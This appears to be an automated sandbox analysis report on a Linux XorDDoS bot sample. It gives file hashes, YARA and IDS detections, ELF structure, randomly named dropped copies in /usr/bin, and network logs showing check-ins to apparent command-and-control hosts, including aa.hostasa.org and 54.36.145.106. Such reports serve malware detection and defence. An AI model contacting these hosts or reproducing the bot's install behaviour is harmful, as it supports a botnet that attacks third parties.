                                                        SHA-256:F2BFC0A15FEA6F0A28FA520C8210FA8FEF090C9E9F0EF13C0E3BFD5B3D8E46B1
                                                        SHA-512:1B6F1A9C77F27E73728EE2E3DA2CD533E8FF4798399B43AD1AC34E3E5C66E4A57538E0CEC776A04471839CE6767EA8D95C35EA3FB3399D57A1EF3AA41D2C0FA9
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eoqlmyvucn, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eoqlmyvucn, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eoqlmyvucn, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eoqlmyvucn, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197605633721598
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoju:/fUywKQ7Fb1pNL/p52fjQn36Euu
                                                        MD5:872880F6F7422435AE6D1EAEFE04A5A4
                                                        SHA1:155452D98E2ECFC92E65FC9B09A87F93B1910DF4
                                                        SHA-256:ECD98C634F61229F9E9C33E840B97612F031C6E14F53DF738D9A4DFC949159DD
                                                        SHA-512:EC3333751D37F2BC05D732FAD10AD812524EF1F9D24BCC034CDFD46DC94C5C7DC539E701C628DDB84F486E670E1876093035E505C58FC22F4C3A6BE3F86B2644
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hgfzmygnbx, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/hgfzmygnbx, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/hgfzmygnbx, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/hgfzmygnbx, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.1975992591476805
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojb:/fUywKQ7Fb1pNL/p52fjQn36Eub
                                                        MD5:5CA107404275778CA2B07A8590D03272
                                                        SHA1:9BC7DD744C8780EA288D71289C8F8A3DA771CB52
                                                        SHA-256:9FB5C934516F7BDA1072042DB6732BB99500AF937B007E424811C95EA48DC235
                                                        SHA-512:B83724CB1A79216AC47A577A57525C95DD2D296304C3F7395370095FEB20A16F39646D2FC3F3BE61B48017F5003919D7CB4E60BBC0064986E21FD646F4F3A87F
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hiueshutol, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/hiueshutol, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/hiueshutol, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/hiueshutol, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197587289551511
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojB:/fUywKQ7Fb1pNL/p52fjQn36EuB
                                                        MD5:A2EDA8F3694EF7EB8B04888E5ED38A24
                                                        SHA1:9B174D2C1B4840C39A60B72A717FAA80BFEE5A6E
                                                        SHA-256:AFFD4929AEB05C1686FEA6A00456FC8365393B99D2671FAAC07BDFFD1EB860A8
                                                        SHA-512:1716D1DC3AF47788FF26C7FFBD1E2E0E2E3742B350F52A8CDC5A328BDC59720AA57F1CD3B93DDA23C547B5C3EA14E745ACD5EF50866610C3A4372F644DF995C2
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lnmgbribvb, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/lnmgbribvb, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/lnmgbribvb, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/lnmgbribvb, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197586254269363
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojp:/fUywKQ7Fb1pNL/p52fjQn36Eup
                                                        MD5:A48EF1E0784BBCADF9025524CDF26387
                                                        SHA1:A178E12270E5B2205407FB06D8EF8F957F746DDB
                                                        SHA-256:969855A1B5138348ED28893E9E369DFF20B7DD3C522DA56397B448233A973D97
                                                        SHA-512:EBC4AE8B72C13BA9EFC3A043D4EE41E2B284AD05D7787E94D54FF993BA5F77D6BC93F642302C1DC48F117B0DD93212E4BDB6CD0C3AFE098A94972938CC38B5C6
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lsodknzpps, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/lsodknzpps, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/lsodknzpps, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/lsodknzpps, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.19759150361793
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojo:/fUywKQ7Fb1pNL/p52fjQn36Euo
                                                        MD5:9B1DA24294CED34670C702E0FDEFA42B
                                                        SHA1:6F921CC33772BB1AA7F33CC0265412FDCFE3888D
                                                        SHA-256:1218948B2DB76CC5A0E4C12BD3B81C91ADCFA6658774D4A937A6571EEBAABE30
                                                        SHA-512:B277205E3C2EA569CF66DDE9BE8617372C08FA76AB8CAD8B1300B98909DAC0DA13CE65E19F355C428DD6D636A621DF4ACACDE54E3A74A7605BFEF27839621EEC
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mhvrcmaysv, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mhvrcmaysv, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/mhvrcmaysv, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/mhvrcmaysv, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197574373545366
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojx:/fUywKQ7Fb1pNL/p52fjQn36Eux
                                                        MD5:635DA966C3034A8039505F87E4BD322D
                                                        SHA1:568D314D6AD806328A99D5455682411ECC89CABB
                                                        SHA-256:BBD60D699610703E5B6AC677886F0BCC9FC30418873461F8CD62536614F6B4D2
                                                        SHA-512:6EE1ED3E5FAB17A3B0B5E69603B8D348C21AD19EE265D9C6F8CA199880A86C8655EDBCD7557DD6FD6BF3CBC46EBAA9CEF366E62A34C960A332F8B05861834A27
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wdcujvrbpo, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wdcujvrbpo, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wdcujvrbpo, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wdcujvrbpo, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197592280615578
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojV:/fUywKQ7Fb1pNL/p52fjQn36EuV
                                                        MD5:8816CEE3C946563644FF93E94D5FFA35
                                                        SHA1:BB7520DC5D1663E04418BB3F0A241F1066D11168
                                                        SHA-256:CEC02A87D2B5B3631EBD5A8A0EA289C4290E6782F2EADBF36E702AA273EDC77C
                                                        SHA-512:A4465692FE25ED080A592CC7934B7100BD664D6423A67A055E0330BC1D6F6D5A96ACE0214E2E15708A20EA78ECFF99786DBC7CF2A755821CA85361B321ACAA14
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wzhmvohlxs, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wzhmvohlxs, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wzhmvohlxs, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wzhmvohlxs, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        Process:/tmp/iJl2Sb6qRa
                                                        File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Category:dropped
                                                        Size (bytes):548649
                                                        Entropy (8bit):6.197588932041385
                                                        Encrypted:false
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojR:/fUywKQ7Fb1pNL/p52fjQn36EuR
                                                        MD5:882C9B8E9CE35602DB8FA3BC5ADA4CC0
                                                        SHA1:D2FB281DA33A2D7E6F021384D79887B285EE9A4D
                                                        SHA-256:157FA03A0C3CAEF04419D236AE493BD1D7818FC7E3CA3CD7C86520110497EB5A
                                                        SHA-512:B8895FFA0217C720354E7CDAF76CC8012CB7F38F455202CB6E263AF01E7C4EF292D28842CB056639A2FB166D255879DD2EDC94BA479A4133946A2279977BAC70
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zbksjhrfms, Author: Joe Security
                                                        • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zbksjhrfms, Author: ditekSHen
                                                        • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/zbksjhrfms, Author: unknown
                                                        • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/zbksjhrfms, Author: unknown
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                        File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                        Entropy (8bit):6.197537018397919
                                                        TrID:
                                                        • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                        • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                        File name:iJl2Sb6qRa
                                                        File size:548638
                                                        MD5:58881cdfffced4e9013ee3ffe4fdc941
                                                        SHA1:425c413c1ab4e1891d85334bdd05ca279ceea127
                                                        SHA256:8a1feca84fe6d3d011c183a32c1f48b1edb6c98f2d411f0e83038659a3e274c0
                                                        SHA512:f4ef3af2332236c07d660a8133d8f345fd7362c2f5ac1a394ef09ec351923902c01481c09b27bca30273b8ecca896047a7b69466f90e65a0dd455c2bc34d644d
                                                        SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojo:/fUywKQ7Fb1pNL/p52fjQn36Euo
                                                        TLSH:68C45C56E283E2F7C82705B0134BF7BF4620B6359461CD86B7989D5AB9338F22A4D353
                                                        File Content Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts.......................... ... ................I..............@...........Q.td........................................GNU.................U......5...

                                                        ELF header

                                                        Class:
                                                        Data:
                                                        Version:
                                                        Machine:
                                                        Version Number:
                                                        Type:
                                                        OS/ABI:
                                                        ABI Version:
                                                        Entry Point Address:
                                                        Flags:
                                                        ELF Header Size:
                                                        Program Header Offset:
                                                        Program Header Size:
                                                        Number of Program Headers:
                                                        Section Header Offset:
                                                        Section Header Size:
                                                        Number of Section Headers:
                                                        Header String Table Index:
                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                        NULL0x00x00x00x00x0000
                                                        .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                        .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                        .textPROGBITS0x80481100x1100x681f80x00x6AX0016
                                                        __libc_freeres_fnPROGBITS0x80b03100x683100x100f0x00x6AX0016
                                                        __libc_thread_freeres_fnPROGBITS0x80b13200x693200x1db0x00x6AX0016
                                                        .finiPROGBITS0x80b14fc0x694fc0x1c0x00x6AX004
                                                        .rodataPROGBITS0x80b15200x695200x152e00x00x2A0032
                                                        __libc_subfreeresPROGBITS0x80c68000x7e8000x300x00x2A004
                                                        __libc_atexitPROGBITS0x80c68300x7e8300x40x00x2A004
                                                        __libc_thread_subfreeresPROGBITS0x80c68340x7e8340x80x00x2A004
                                                        .eh_framePROGBITS0x80c683c0x7e83c0x60a00x00x2A004
                                                        .gcc_except_tablePROGBITS0x80cc8dc0x848dc0x11b0x00x2A001
                                                        .tdataPROGBITS0x80cd9f80x849f80x140x00x403WAT004
                                                        .tbssNOBITS0x80cda0c0x84a0c0x2c0x00x403WAT004
                                                        .ctorsPROGBITS0x80cda0c0x84a0c0x80x00x3WA004
                                                        .dtorsPROGBITS0x80cda140x84a140xc0x00x3WA004
                                                        .jcrPROGBITS0x80cda200x84a200x40x00x3WA004
                                                        .data.rel.roPROGBITS0x80cda240x84a240x2c0x00x3WA004
                                                        .gotPROGBITS0x80cda500x84a500x80x40x3WA004
                                                        .got.pltPROGBITS0x80cda580x84a580xc0x40x3WA004
                                                        .dataPROGBITS0x80cda800x84a800xb400x00x3WA0032
                                                        .bssNOBITS0x80ce5c00x855c00x67780x00x3WA0032
                                                        __libc_freeres_ptrsNOBITS0x80d4d380x855c00x140x00x3WA004
                                                        .commentPROGBITS0x00x855c00x4220x00x0001
                                                        .shstrtabSTRTAB0x00x859e20x1160x00x0001
                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                        LOAD0x00x80480000x80480000x849f70x849f76.20400x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                        LOAD0x849f80x80cd9f80x80cd9f80xbc80x73543.66490x6RW 0x1000.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                        NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                        TLS0x849f80x80cd9f80x80cd9f80x140x402.66100x4R 0x4.tdata .tbss
                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        192.168.2.2054.36.145.1064643415222020381 04/04/23-19:53:10.224062TCP2020381ET TROJAN DDoS.XOR Checkin464341522192.168.2.2054.36.145.106
                                                        192.168.2.208.8.8.859877532021326 04/04/23-19:53:10.082524UDP2021326ET TROJAN Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)5987753192.168.2.208.8.8.8
                                                        192.168.2.20199.59.243.22355892802021336 04/04/23-19:53:10.133352TCP2021336ET TROJAN DDoS.XOR Checkin via HTTP5589280192.168.2.20199.59.243.223
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 4, 2023 19:53:10.113378048 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:10.113981962 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:10.132760048 CEST8055892199.59.243.223192.168.2.20
                                                        Apr 4, 2023 19:53:10.132913113 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:10.133352041 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:10.141346931 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:10.141460896 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:10.143085957 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:10.152129889 CEST8055892199.59.243.223192.168.2.20
                                                        Apr 4, 2023 19:53:10.223905087 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:10.224061966 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:10.251943111 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:10.252202988 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:10.335390091 CEST8055892199.59.243.223192.168.2.20
                                                        Apr 4, 2023 19:53:10.335428953 CEST8055892199.59.243.223192.168.2.20
                                                        Apr 4, 2023 19:53:10.335675001 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:10.335714102 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:10.347790956 CEST8055892199.59.243.223192.168.2.20
                                                        Apr 4, 2023 19:53:10.347932100 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:15.340404034 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:15.362216949 CEST8055892199.59.243.223192.168.2.20
                                                        Apr 4, 2023 19:53:15.362312078 CEST5589280192.168.2.20199.59.243.223
                                                        Apr 4, 2023 19:53:20.350023985 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:20.350192070 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:30.382278919 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:30.382420063 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:40.414480925 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:40.414666891 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:41.541491032 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:41.541671038 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:53:51.572138071 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:53:51.572328091 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:54:01.604254007 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:54:01.604407072 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:54:11.638979912 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:54:11.639096975 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:54:16.628566980 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:54:16.628921032 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:54:26.653979063 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:54:26.654177904 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:54:36.686217070 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:54:36.686359882 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:54:46.718497038 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:54:46.718735933 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:54:51.720493078 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:54:51.720640898 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:55:01.751437902 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:55:01.751599073 CEST464341522192.168.2.2054.36.145.106
                                                        Apr 4, 2023 19:55:11.783895969 CEST15224643454.36.145.106192.168.2.20
                                                        Apr 4, 2023 19:55:11.784087896 CEST464341522192.168.2.2054.36.145.106
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Apr 4, 2023 19:53:10.082524061 CEST5987753192.168.2.208.8.8.8
                                                        Apr 4, 2023 19:53:10.084041119 CEST5094153192.168.2.208.8.8.8
                                                        Apr 4, 2023 19:53:10.113106966 CEST53509418.8.8.8192.168.2.20
                                                        Apr 4, 2023 19:53:10.113738060 CEST53598778.8.8.8192.168.2.20
